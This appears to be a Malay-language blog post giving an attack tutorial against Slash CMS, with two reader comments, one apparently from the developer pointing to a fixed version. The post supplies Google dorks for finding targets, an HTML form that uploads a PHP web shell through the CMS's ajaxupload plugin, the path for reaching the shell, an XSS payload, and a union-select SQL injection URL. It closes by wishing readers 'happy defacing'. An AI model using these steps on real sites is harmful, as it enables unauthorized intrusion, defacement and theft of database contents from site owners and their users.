Ok jom mula~
Google Dork :
"Slash CMS"
@
inurl:slash-cms
note: korang reka sendiri dork ;)
Remote File Upload
1. Korang buat satu file upload.php dan upload ke dalam free hosting atau mana2 saja.
code :
<form action="http://www.target.com/slash-cms/core/plugins/ajaxupload/ajaxupload.php" method="post" enctype="multipart/form-data">
<input type="file" name="sl_userfile">
<input type="submit" value="Upload"></form>
Uploaded File Path: /tmp/{Filename}.php
<input type="file" name="sl_userfile">
<input type="submit" value="Upload"></form>
Uploaded File Path: /tmp/{Filename}.php
Gantikan www.target.com kepada link target website korang.
Nak tengok shell :
www.target.com/tmp/shell.php
XSS
http://www.target.com/slash-cms/index.php?mod=sl_pages&id=<script>alert(1)</script>
SQL Injection
http://www.target.com/slash-cms/index.php?mod=sl_pages&id=[SQLI]
Contoh:http://www.target.com/slash-cms/index.php?mod=sl_pages&id=-2+union+select+1,2,user(),database(),5,6
Itu saja exploit kali ini..Happy defacing...
cantik....
ReplyDeletecorrected vulnerability : https://github.com/wakdev/slash-cms/
ReplyDeleteSo help us to develop this project ;)